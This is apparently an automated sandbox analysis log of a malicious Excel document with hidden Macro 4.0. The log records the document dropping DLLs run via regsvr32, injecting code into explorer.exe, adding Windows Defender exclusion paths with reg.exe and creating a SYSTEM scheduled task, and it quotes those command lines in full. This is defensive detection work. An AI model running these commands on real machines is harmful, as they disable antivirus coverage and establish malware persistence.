    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD087.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@33/12@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Compensation-1730406737-09272021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{BB664AD5-33F0-401E-9904-CDFCDB509CFF}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{8402844E-5395-47D4-81FA-4A2D74AF4E12}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{0D1414CC-BF73-45B0-83AD-1EA17EEB389B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{8402844E-5395-47D4-81FA-4A2D74AF4E12}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{0D1414CC-BF73-45B0-83AD-1EA17EEB389B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{BB664AD5-33F0-401E-9904-CDFCDB509CFF}
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.422309790.00000000027B1000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push esi; mov dword ptr [esp], 00000001h
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831424 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831424 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283242A push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283242A push 00000000h; mov dword ptr [esp], edi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283242A push 00000000h; mov dword ptr [esp], ebx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0283242A push 00000000h; mov dword ptr [esp], edi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push edi; mov dword ptr [esp], 00000004h
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push edx; mov dword ptr [esp], 000FFFFFh
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831000 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[1].dat.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[2].dat.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name:
    Source: 44466.7022844907[3].dat.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name: .rdatat
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd1.red.10.drStatic PE information: section name: .rdatat
    Source: Drezd1.red.10.drStatic PE information: section name:
    Source: Drezd1.red.10.drStatic PE information: section name:
    Source: Drezd1.red.10.drStatic PE information: section name:
    Source: Drezd.red.15.drStatic PE information: section name: .rdatat
    Source: Drezd.red.15.drStatic PE information: section name:
    Source: Drezd.red.15.drStatic PE information: section name:
    Source: Drezd.red.15.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name: .rdatat
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFAD LoadLibraryA,GetProcAddress,

    Persistence and Installation Behavior:

    Uses cmd line tools excessively to alter registry or file data
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd2.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd2.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd2.red

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
    Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd2.red
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05

    Hooking and other Techniques for Hiding and Protection:

    Overwrites code with unconditional jumps - possibly setting hooks in foreign process
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2008 base: AE102D value: E9 BA 4C 5A FF
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2608 base: AE102D value: E9 BA 4C 5A FF
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2540 base: AE102D value: E9 BA 4C 5A FF
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 408 base: AE102D value: E9 BA 4C 5A FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2920 | Thread sleep count: 48 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2216 | Thread sleep time: -100000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 | Thread sleep count: 52 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2648 | Thread sleep count: 72 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2932 | Thread sleep count: 56 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2596 | Thread sleep count: 53 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2636 | Thread sleep count: 45 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2636 | Thread sleep time: -104000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 788 | Thread sleep count: 73 > 30
    Source: C:\Windows\SysWOW64\explorer.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat
    Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Windows\SysWOW64\explorer.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_02834495 or ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_00D84495 or ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00085A61 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regionsShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: AE102D
    Allocates memory in foreign processes
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2008 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2008 base: AE102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2608 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2608 base: AE102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2540 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2540 base: AE102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 408 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 408 base: AE102D value: E9
    Yara detected hidden Macro 4.0 in Excel
    Source: Yara match | File source: Compensation-1730406737-09272021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmp | Binary or memory string: !Progman
    Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_000831C2 CreateNamedPipeA,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
